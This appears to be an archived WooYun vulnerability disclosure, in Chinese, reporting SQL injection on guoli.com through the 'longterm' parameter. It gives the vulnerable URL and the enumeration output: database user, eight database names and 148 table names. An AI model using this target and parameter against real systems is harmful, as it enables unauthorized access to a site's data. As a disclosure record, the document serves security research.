乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-07-04: 积极联系厂商并且等待厂商认领中,细节不对外公开 2015-08-18: 厂商已经主动忽略漏洞,细节向公众公开
RT
官网:http://www.guoli.com/注入地址:
http://www.guoli.com/renwen/index.php?&longterm=1&sp1=0参数:longterm存在注入
信息:
current user: '[email protected]'
数据库:
current database: 'adushi'
available databases [8]:[*] adushi[*] dedev5[*] discuz[*] guoli[*] guolicuser[*] information_schema[*] uch[*] yanqing
表:
Database: adushi[148 tables]+-------------------------+| `ads_class_ attribute` || ads_act_joinpep || ads_activity || ads_activity_list || ads_admin_group || ads_admin_groupmenu || ads_admin_member || ads_admin_membergroup || ads_admin_menu || ads_adphoto || ads_area || ads_area1 || ads_attachments || ads_attachtypes || ads_bottomcol || ads_buy_coding || ads_caches || ads_car_model || ads_car_modelprice || ads_car_trade || ads_car_type || ads_checkuse || ads_cityip || ads_credits_details || ads_deal_record || ads_defineclassify || ads_dict_list || ads_domain || ads_ecard_bind || ads_email_list || ads_employee || ads_employeeclass || ads_exper_sms || ads_help || ads_helpclass || ads_hotel_finance || ads_hotel_info || ads_leaveword || ads_line_website || ads_lwresponses || ads_member || ads_mobile_certify || ads_model_reg || ads_otherfavorite || ads_package_special || ads_pay_gathering || ads_pay_trade || ads_person_add || ads_person_interest || ads_product_favorite || ads_product_pic || ads_product_rdcmd || ads_product_rmdInfo || ads_productclass || ads_propose || ads_qq_session || ads_responses || ads_sale_special || ads_sales_comment || ads_search_vp || ads_searchresultlist || ads_shop || ads_shop_auditwrong || ads_shop_cdpic || ads_shop_certify || ads_shop_checkpeople || ads_shop_comment || ads_shop_comment_tmp || ads_shop_compare || ads_shop_eattrade || ads_shop_express || ads_shop_extend || ads_shop_favorite || ads_shop_fields || ads_shop_hotel || ads_shop_hotelprice || ads_shop_hoteltrade || ads_shop_industry || ads_shop_info || ads_shop_infothemes || ads_shop_invoice || ads_shop_links || ads_shop_pic_tmp || ads_shop_picthemes || ads_shop_product || ads_shop_productcomment || ads_shop_protection || ads_shop_ranking || ads_shop_recommend || ads_shop_returnmoney || ads_shop_sales || ads_shop_scenery || ads_shop_service || ads_shop_tell || ads_shop_theme || ads_shop_tmp || ads_shop_total_sub || ads_shop_trade || ads_shop_trade_product || ads_shop_tradereturn || ads_shop_vipcertify || ads_shop_viptry || ads_shopclass || ads_shopclassold || ads_specialinfo || ads_specialinfo_content || ads_survey_answer || ads_survey_question || ads_survey_result || ads_survey_subject || ads_tag || ads_taglist || ads_team_info || ads_tellfriend || ads_templet || ads_templet_content || ads_templet_value || ads_totalsearchresult || ads_user || ads_user_browse || ads_user_composite || ads_user_ecoupons || ads_user_feedback || ads_user_hotelperson || ads_user_integral || ads_user_integralwater || ads_user_invite || ads_user_pay || ads_user_recommend || ads_user_reply || ads_user_survey || ads_user_ticket || ads_user_ticketwater || ads_webtell || ads_words || data_do || hotel_day_count || hotel_info_20121213 || hotel_price_data || hotel_quote_report || hotel_room_dayprice || imp_hotel_p_dayprice || shop_data_contrast || temp || temp2 || tools_ctrip_hotelinfo || xc_city || xc_hotel_info |+-------------------------+
如上
过滤
未能联系到厂商或者厂商积极拒绝